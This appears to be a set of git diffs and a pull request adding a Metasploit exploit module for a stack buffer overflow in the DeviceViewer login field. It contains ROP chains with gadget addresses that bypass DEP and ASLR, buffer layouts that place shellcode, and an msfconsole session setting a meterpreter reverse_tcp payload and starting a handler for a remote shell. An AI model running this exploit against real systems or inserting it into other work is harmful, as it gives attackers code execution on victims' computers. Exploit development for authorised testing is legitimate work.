+      buffer << make_nops(max_buff_length-buffer.length) # filler
+    else
+    # plain SEH exploit
+      buffer << make_nops(target['Offset'])
+      buffer << generate_seh_payload(target.ret)
+      buffer << make_nops(max_buff_length-buffer.length)
+
+    end
+
+    print_status("Trying target #{target.name}...")
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(buffer)
+
+  end
+end

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -44,19 +44,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
       'Targets'    =>
         [
-          [ 'DeviceViewer v.3.10.12.0 - Windows 10 (DEP + ASLR Bypass)', # Windows 10 Pro x64 v.1909 Build 18363.720(Windows enforce ASLR and DEP automatically on default configuration)
+          [ 'Windows 10 (DEP + ASLR Bypass)', # Windows 10 Pro x64 v.1909 Build 18363.720(Windows enforce ASLR and DEP automatically on default configuration)
             {
               'Ret'     =>  0x6ad795e9, # 0x6ad795e9 : {pivot 3324 / 0xcfc} :  # ADD ESP,0CEC # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-52.dll] **   |   {PAGE_EXECUTE_WRITECOPY}
               'Offset'  =>  264
             }
           ],
-          [ 'DeviceViewer v.3.10.12.0 - Windows 7 (DEP + ASLR Bypass)', # Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601(Windows enforce ASLR and DEP automatically on default configuration)
+          [ 'Windows 7 (DEP + ASLR Bypass)', # Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601(Windows enforce ASLR and DEP automatically on default configuration)
             {
-              'Ret'     =>  0x6a23c5ee, # 0x6a23c5ee : {pivot 3308 / 0xcec} :  # MOV EAX,18 # ADD ESP,0CDC # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-54.dll] **   |   {PAGE_EXECUTE_READ}
+              'Ret'     =>  0x6a19b49f, # 0x6a19b49f : {pivot 3100 / 0xc1c} :  # ADD ESP,0C0C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-54.dll] **   |   {PAGE_EXECUTE_READ}
               'Offset'  =>  264
             }
           ],
-          [ 'DeviceViewer v.3.10.12.0 - Windows XP x86 SEH', # Windows XP Pro x86 v.5.1.2600 SP 3 Build 2600
+          [ 'Windows XP x86 SEH', # Windows XP Pro x86 v.5.1.2600 SP 3 Build 2600
             {
               'Ret' => 0x69901d06, #POP ESI, POP EDI, RET  avformat-54.dll
               'Offset' => 264
@@ -71,6 +71,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   end
 
+  def create_rop_nop()
+    rop_nop = [
+      0x6a4a494a,  # 0x6a4a494a (RVA : 0x003e494a) : # DEC EBX # ADD AL,83 # RETN    ** [avcodec-54.dll] **   |  asciiprint,ascii,alphanum {PAGE_EXECUTE_READ}
+    ].flatten.pack("V*")
+    return rop_nop
+  end
+
   def create_rop_chain7()
     ## rop chain generated with mona.py - www.corelan.be, fixed by VoidSec
     # Register setup for VirtualProtect() :
@@ -83,56 +90,44 @@ class MetasploitModule < Msf::Exploit::Remote
     # ESI = ptr to VirtualProtect()
     # EDI = ROP NOP (RETN)
     ##
-    # rop chain generated with mona.py - www.corelan.be
     rop_gadgets =
     [
-      #[---INFO:gadgets_to_set_esi:---]
-      0x6a59babd,  # POP EAX # RETN [avcodec-54.dll]
-      0x6ad38304,  # ptr to &VirtualProtect() [IAT avcodec-54.dll]
-      0x69984f93,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-54.dll]
-      0x6a544819,  # XCHG EAX,ESI # RETN [avcodec-54.dll]
-      #[---INFO:gadgets_to_set_ebp:---]
-      0x6991aea2,  # POP EBP # RETN [avformat-54.dll]
-      0x6a1215c3,  # & push esp # ret  [avcodec-54.dll]
       #[---INFO:gadgets_to_set_ebx:---]
-      0x6a569810,  # POP EDX # RETN [avcodec-54.dll]
+      0x6a5d8c78,  # POP EAX # RETN    ** [avcodec-54.dll] **   |   {PAGE_EXECUTE_READ}
       0xfffffdff,  # Value to negate, will become 0x00000201
-      0x6a5d3987,  # NEG EDX # RETN [avcodec-54.dll]
-      0x6a341293,  # PUSH EDX # MOV DWORD PTR DS:[EAX+EDX],ECX # POP EBX # RETN [avcodec-54.dll]
+      0x6a2420e8,  # NEG EAX # RETN    ** [avcodec-54.dll] **   |   {PAGE_EXECUTE_READ}
+      0x6a17ca04,  # PUSH EAX # POP EBX # POP ESI # RETN    ** [avcodec-54.dll] **   |   {PAGE_EXECUTE_READ}
+      0x41414141,  # Padding
       #[---INFO:gadgets_to_set_edx:---]
       0x6a569810,  # POP EDX # RETN [avcodec-54.dll]
       0xffffffc0,  # Value to negate, will become 0x00000040
-      0x6a5d3732,  # NEG EDX # RETN [avcodec-54.dll]
+      0x6a5d3987,  # NEG EDX # RETN [avcodec-54.dll]
+      #[---INFO:gadgets_to_set_esi:---]
+      0x6a5d9990,  # POP EAX # RETN [avcodec-54.dll]
+      0x6ad38304,  # ptr to &VirtualProtect() [IAT avcodec-54.dll]
+      0x699af4cb,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-54.dll]
+      0x6a53c7b9,  # XCHG EAX,ESI # RETN [avcodec-54.dll]
+      #[---INFO:gadgets_to_set_ebp:---]
+      0x699802db,  # POP EBP # RETN [avformat-54.dll]
+      0x6a1215c3,  # & push esp # ret  [avcodec-54.dll]
       #[---INFO:gadgets_to_set_ecx:---]
-      0x6a5fb07c,  # POP ECX # RETN [avcodec-54.dll]
-      0x68ba656d,  # &Writable location [avutil-51.dll]
+      0x6a4a5715,  # POP ECX # RETN [avcodec-54.dll]
+      0x6ae9cac2,  # &Writable location [avutil-50.dll]
       #[---INFO:gadgets_to_set_edi:---]
-      0x68b824ed,  # POP EDI # RETN [avutil-51.dll]
+      0x69915933,  # POP EDI # RETN [avformat-54.dll]
       0x6a2420ea,  # RETN (ROP NOP) [avcodec-54.dll]
       #[---INFO:gadgets_to_set_eax:---]
-      0x6a0f2594,  # POP EAX # RETN [avcodec-54.dll]
+      0x6a5dac99,  # POP EAX # RETN [avcodec-54.dll]
       0x90909090,  # nop
       #[---INFO:pushad:---]
-      0x6a5eb992,  # PUSHAD # RETN [avcodec-54.dll]
+      0x6a6049b7,  # PUSHAD # RETN [avcodec-54.dll]
     ].flatten.pack("V*")
-
     return rop_gadgets
-
   end
 
   def create_rop_chain10()
-    ## rop chain generated with mona.py - www.corelan.be, fixed by VoidSec
-    # Register setup for VirtualProtect() :
-    # EAX = NOP (0x90909090)
-    # ECX = lpOldProtect (ptr to W address)
-    # EDX = NewProtect (0x40)
-    # EBX = dwSize
-    # ESP = lPAddress (automatic)
-    # EBP = ReturnTo (ptr to jmp esp)
-    # ESI = ptr to VirtualProtect()
-    # EDI = ROP NOP (RETN)
-    ##
     rop_gadgets = [
+      ## rop chain generated with mona.py - www.corelan.be, fixed by VoidSec
       #[---INFO:gadgets_to_set_edx:---]
       0x6b050b5e,  # POP EAX # RETN [avcodec-52.dll]
       0xffffffd7,  # put delta into eax (-> put 0x00000040 into edx)
@@ -166,7 +161,6 @@ class MetasploitModule < Msf::Exploit::Remote
       0x699047dc,  # PUSHAD # RETN [avformat-54.dll]
     ].flatten.pack("V*")
     return rop_gadgets
-
   end
 
   def exploit
@@ -186,14 +180,14 @@ class MetasploitModule < Msf::Exploit::Remote
       buffer << stack_adj
       buffer << payload.encoded # shellcode
       buffer << make_nops(max_buff_length-buffer.length) # filler
-    elsif target.ret == 0x6a23c5ee
+    elsif target.ret == 0x6a19b49f
       # win 7, add rop and different layout
       # |                                                     buffer (4000)                                                              |
-      # | garbage (254) | nSEH (4) | SEH (4) | filler (456) | rop chain (92) | stack adj (6) | shellcode (371) | filler (4000-len(buff)) |
+      # | garbage (254) | nSEH (4) | SEH (4) | rop_nop (320) | rop chain (84) | stack adj (6) | shellcode (371) | filler (4000-len(buff)) |
       buffer << make_nops(target['Offset']) # garbage
       buffer << make_nops(4) # nSEH
       buffer << [target.ret].pack("V") # SEH
-      buffer << make_nops(456) # filler
+      buffer << create_rop_nop()*80
       buffer << create_rop_chain7() # ROP
       buffer << stack_adj
       buffer << payload.encoded # shellcode
@@ -203,12 +197,10 @@ class MetasploitModule < Msf::Exploit::Remote
       buffer << make_nops(target['Offset'])
       buffer << generate_seh_payload(target.ret)
       buffer << make_nops(max_buff_length-buffer.length)
-
     end
     #debug message
     #print_status("Trying target #{target.name}...")
     print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(buffer)
-
   end
 end

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -44,13 +44,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
       'Targets'    =>
         [
-          [ 'Windows 10 (DEP + ASLR Bypass)', # Windows 10 Pro x64 v.1909 Build 18363.720(Windows enforce ASLR and DEP automatically on default configuration)
+          [ 'Windows 10 (DEP + ASLR Bypass)', # Windows 10 Pro x64 v.1909 Build 18363.720(Windows enforces ASLR and DEP automatically on default configuration)
             {
               'Ret'     =>  0x6ad795e9, # 0x6ad795e9 : {pivot 3324 / 0xcfc} :  # ADD ESP,0CEC # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-52.dll] **   |   {PAGE_EXECUTE_WRITECOPY}
               'Offset'  =>  264
             }
           ],
-          [ 'Windows 7 (DEP + ASLR Bypass)', # Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601(Windows enforce ASLR and DEP automatically on default configuration)
+          [ 'Windows 7 (DEP + ASLR Bypass)', # Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601(Windows enforces ASLR and DEP automatically on default configuration)
             {
               'Ret'     =>  0x6a19b49f, # 0x6a19b49f : {pivot 3100 / 0xc1c} :  # ADD ESP,0C0C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-54.dll] **   |   {PAGE_EXECUTE_READ}
               'Offset'  =>  264
@@ -198,8 +198,6 @@ class MetasploitModule < Msf::Exploit::Remote
       buffer << generate_seh_payload(target.ret)
       buffer << make_nops(max_buff_length-buffer.length)
     end
-    #debug message
-    #print_status("Trying target #{target.name}...")
     print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(buffer)
   end

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -206,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     end
     #debug message
-    print_status("Trying target #{target.name}...")
+    #print_status("Trying target #{target.name}...")
     print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(buffer)
 

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -13,9 +13,10 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'    => 'Shenzhen Sricctv Technology DeviceViewer User Field Stack Buffer Overlow',
       'Description'  => %q{
-        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
-        username login field. In the "User" login field paste the content of the generated
-        exploit and press "Login". This module will bypass DEP and ASLR.
+        This exploits a SEH stack buffer overflow in Shenzhen Sricctv Technology DeviceViewer
+        v.3.10.12.0 present in the username login field.
+        In the "User" login field paste the content of the generated exploit and press "Login".
+        This module will bypass DEP and ASLR.
         It was successfully tested on Windows 10, Windows 7 and Windows XP SP3.
       },
       'License'    => MSF_LICENSE,

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -37,34 +37,101 @@ class MetasploitModule < Msf::Exploit::Remote
       'Payload'  =>
         {
           'Space' => 3728,
-          'BadChars' => "\x81\xc4\x24\xfa\xff\xff",
+          'BadChars' => "\x00\x0a\x0d",
           'DisableNops' => true,
-          'StackAdjustment' => -1500
+          #'StackAdjustment' => -1500
         },
 
       'Targets'    =>
         [
-          [ 'DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)', # Windows 10 Pro x64 v.1909 Build 18363.720
+          [ 'DeviceViewer v.3.10.12.0 - Windows 10 (DEP + ASLR Bypass)', # Windows 10 Pro x64 v.1909 Build 18363.720(Windows enforce ASLR and DEP automatically on default configuration)
             {
               'Ret'     =>  0x6ad795e9, # 0x6ad795e9 : {pivot 3324 / 0xcfc} :  # ADD ESP,0CEC # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-52.dll] **   |   {PAGE_EXECUTE_WRITECOPY}
               'Offset'  =>  264
             }
           ],
-        [ 'DeviceViewer v.3.10.12.0 - Windows XP Pro x64, Windows 7 x86', {
+          [ 'DeviceViewer v.3.10.12.0 - Windows 7 (DEP + ASLR Bypass)', # Windows 7 Pro x86 v.6.1.7601 SP 1 Build 7601(Windows enforce ASLR and DEP automatically on default configuration)
+            {
+              'Ret'     =>  0x6a23c5ee, # 0x6a23c5ee : {pivot 3308 / 0xcec} :  # MOV EAX,18 # ADD ESP,0CDC # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [avcodec-54.dll] **   |   {PAGE_EXECUTE_READ}
+              'Offset'  =>  264
+            }
+          ],
+          [ 'DeviceViewer v.3.10.12.0 - Windows XP x86 SEH', # Windows XP Pro x86 v.5.1.2600 SP 3 Build 2600
+            {
               'Ret' => 0x69901d06, #POP ESI, POP EDI, RET  avformat-54.dll
               'Offset' => 264
-          } ],
+            }
+          ],
         ],
       'Privileged'  => false,
-      'DisclosureDate'  => 'Apr 25 2019',
+      'DisclosureDate'  => 'Apr 10 2019',
       'DefaultTarget'  => 0))
 
     register_options([OptString.new('FILENAME', [ false, 'The file name.', 'DeviceViewer_v.3.10.12.0_exploit.txt'])])
 
   end
 
-  def create_rop_chain()
-    # rop chain generated with mona.py - www.corelan.be, fixed by VoidSec
+  def create_rop_chain7()
+    ## rop chain generated with mona.py - www.corelan.be, fixed by VoidSec
+    # Register setup for VirtualProtect() :
+    # EAX = NOP (0x90909090)
+    # ECX = lpOldProtect (ptr to W address)
+    # EDX = NewProtect (0x40)
+    # EBX = dwSize
+    # ESP = lPAddress (automatic)
+    # EBP = ReturnTo (ptr to jmp esp)
+    # ESI = ptr to VirtualProtect()
+    # EDI = ROP NOP (RETN)
+    ##
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets =
+    [
+      #[---INFO:gadgets_to_set_esi:---]
+      0x6a59babd,  # POP EAX # RETN [avcodec-54.dll]
+      0x6ad38304,  # ptr to &VirtualProtect() [IAT avcodec-54.dll]
+      0x69984f93,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [avformat-54.dll]
+      0x6a544819,  # XCHG EAX,ESI # RETN [avcodec-54.dll]
+      #[---INFO:gadgets_to_set_ebp:---]
+      0x6991aea2,  # POP EBP # RETN [avformat-54.dll]
+      0x6a1215c3,  # & push esp # ret  [avcodec-54.dll]
+      #[---INFO:gadgets_to_set_ebx:---]
+      0x6a569810,  # POP EDX # RETN [avcodec-54.dll]
+      0xfffffdff,  # Value to negate, will become 0x00000201
+      0x6a5d3987,  # NEG EDX # RETN [avcodec-54.dll]
+      0x6a341293,  # PUSH EDX # MOV DWORD PTR DS:[EAX+EDX],ECX # POP EBX # RETN [avcodec-54.dll]
+      #[---INFO:gadgets_to_set_edx:---]
+      0x6a569810,  # POP EDX # RETN [avcodec-54.dll]
+      0xffffffc0,  # Value to negate, will become 0x00000040
+      0x6a5d3732,  # NEG EDX # RETN [avcodec-54.dll]
+      #[---INFO:gadgets_to_set_ecx:---]
+      0x6a5fb07c,  # POP ECX # RETN [avcodec-54.dll]
+      0x68ba656d,  # &Writable location [avutil-51.dll]
+      #[---INFO:gadgets_to_set_edi:---]
+      0x68b824ed,  # POP EDI # RETN [avutil-51.dll]
+      0x6a2420ea,  # RETN (ROP NOP) [avcodec-54.dll]
+      #[---INFO:gadgets_to_set_eax:---]
+      0x6a0f2594,  # POP EAX # RETN [avcodec-54.dll]
+      0x90909090,  # nop
+      #[---INFO:pushad:---]
+      0x6a5eb992,  # PUSHAD # RETN [avcodec-54.dll]
+    ].flatten.pack("V*")
+
+    return rop_gadgets
+
+  end
+
+  def create_rop_chain10()
+    ## rop chain generated with mona.py - www.corelan.be, fixed by VoidSec
+    # Register setup for VirtualProtect() :
+    # EAX = NOP (0x90909090)
+    # ECX = lpOldProtect (ptr to W address)
+    # EDX = NewProtect (0x40)
+    # EBX = dwSize
+    # ESP = lPAddress (automatic)
+    # EBP = ReturnTo (ptr to jmp esp)
+    # ESI = ptr to VirtualProtect()
+    # EDI = ROP NOP (RETN)
+    ##
     rop_gadgets = [
       #[---INFO:gadgets_to_set_edx:---]
       0x6b050b5e,  # POP EAX # RETN [avcodec-52.dll]
@@ -105,26 +172,40 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     max_buff_length = 4000
     buffer = ""
+    stack_adj = "\x81\xc4\x24\xfa\xff\xff" # stack adj; add esp, -1500
 
     if target.ret == 0x6ad795e9
-    # win 10, add rop and different layout
-    # |                                                     buffer (4000)                                                              |
-    # | garbage (254) | nSEH (4) | SEH (4) | filler (384) | rop chain (92) | stack adj (6) | shellcode (371) | filler (4000-len(buff)) |
+      # win 10, add rop and different layout
+      # |                                                     buffer (4000)                                                              |
+      # | garbage (254) | nSEH (4) | SEH (4) | filler (384) | rop chain (92) | stack adj (6) | shellcode (371) | filler (4000-len(buff)) |
       buffer << make_nops(target['Offset']) # garbage
       buffer << make_nops(4) # nSEH
       buffer << [target.ret].pack("V") # SEH
       buffer << make_nops(384) # filler
-      buffer << create_rop_chain() # ROP
+      buffer << create_rop_chain10() # ROP
+      buffer << stack_adj
+      buffer << payload.encoded # shellcode
+      buffer << make_nops(max_buff_length-buffer.length) # filler
+    elsif target.ret == 0x6a23c5ee
+      # win 7, add rop and different layout
+      # |                                                     buffer (4000)                                                              |
+      # | garbage (254) | nSEH (4) | SEH (4) | filler (456) | rop chain (92) | stack adj (6) | shellcode (371) | filler (4000-len(buff)) |
+      buffer << make_nops(target['Offset']) # garbage
+      buffer << make_nops(4) # nSEH
+      buffer << [target.ret].pack("V") # SEH
+      buffer << make_nops(456) # filler
+      buffer << create_rop_chain7() # ROP
+      buffer << stack_adj
       buffer << payload.encoded # shellcode
       buffer << make_nops(max_buff_length-buffer.length) # filler
     else
-    # plain SEH exploit
+      # win xp, plain SEH exploit
       buffer << make_nops(target['Offset'])
       buffer << generate_seh_payload(target.ret)
       buffer << make_nops(max_buff_length-buffer.length)
 
     end
-
+    #debug message
     print_status("Trying target #{target.name}...")
     print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(buffer)

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'  => 'win',
       'Payload'  =>
         {
-          'Space' => 3728,
+          'Space' => 3368,
           'BadChars' => "\x00\x0a\x0d",
           'DisableNops' => true,
           #'StackAdjustment' => -1500

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'    => 'Shenzhen Sricctv Technology DeviceViewer User Field Stack Buffer Overlow',
       'Description'  => %q{
-        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the 
-        username login field. In the "User" login field paste the content of the generated 
+        This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the
+        username login field. In the "User" login field paste the content of the generated
         exploit and press "Login". This module will bypass DEP and ASLR.
         It was successfully tested on Windows 10, Windows 7 and Windows XP SP3.
       },

--- a/modules/exploits/windows/fileformat/device_viewer.rb
+++ b/modules/exploits/windows/fileformat/device_viewer.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'  =>
         [
-          [ 'CVE', '2019-11563' ],
+          # [ 'CVE', '2019-11563' ], # Currently rejected, may get resurrected!
           [ 'EDB', '46779' ]
         ],
       'DefaultOptions' =>


### PR DESCRIPTION
Add Shenzhen Sricctv Technology DeviceViewer User Field Stack Buffer Overlow
- CVE-2019-11563

> This exploits a SEH stack buffer overflow in DeviceViewer v.3.10.12.0 present in the username login field. In the "User" login field paste the content of the generated exploit and press "Login". 
> This module will bypass DEP and ASLR. 
> 
> It was successfully tested on Windows 10, Windows 7 and Windows XP SP3.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/fileformat/device_viewer`
- [ ] `set payload windows/meterpreter/reverse_tcp`
- [ ] `set lhost IP`
- [ ] run
- [ ] `DeviceViewer_v.3.10.12.0_exploit.txt` should be created in user's local msf folder (`/home/user/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt`)
- [ ] Open DeviceViewer on the target
- [ ] In the "User" field paste the content of `DeviceViewer_v.3.10.12.0_exploit.txt` and press "Login"
- [ ] Verify that the handler received the newly created session

## Scenario
```
msf5 > use exploit/windows/fileformat/device_viewer 
msf5 exploit(windows/fileformat/device_viewer) > show options

Module options (exploit/windows/fileformat/device_viewer):

   Name      Current Setting                       Required  Description
   ----      ---------------                       --------  -----------
   FILENAME  DeviceViewer_v.3.10.12.0_exploit.txt  no        The file name.


Exploit target:

   Id  Name
   --  ----
   0   DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)


msf5 exploit(windows/fileformat/device_viewer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/device_viewer) > set lhost 192.168.206.1
lhost => 192.168.206.1
msf5 exploit(windows/fileformat/device_viewer) > run

[*] Trying target DeviceViewer v.3.10.12.0 - Windows 10 Pro x64 (DEP + ASLR Bypass)...
[*] Creating 'DeviceViewer_v.3.10.12.0_exploit.txt' file ...
[+] DeviceViewer_v.3.10.12.0_exploit.txt stored at /home/kali/.msf4/local/DeviceViewer_v.3.10.12.0_exploit.txt
msf5 exploit(windows/fileformat/device_viewer) > 
msf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.206.1
lhost => 192.168.206.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.206.1:4444 
sf5 exploit(windows/fileformat/device_viewer) > use exploit/multi/handler 
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.206.1
lhost => 192.168.206.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.206.1:4444 
```

![device_viewer](https://user-images.githubusercontent.com/5717603/80014330-6f160700-84d0-11ea-90aa-cc47a4343497.png)

PS: it's my first pull, so please, point out everything I should improve and/or change :) 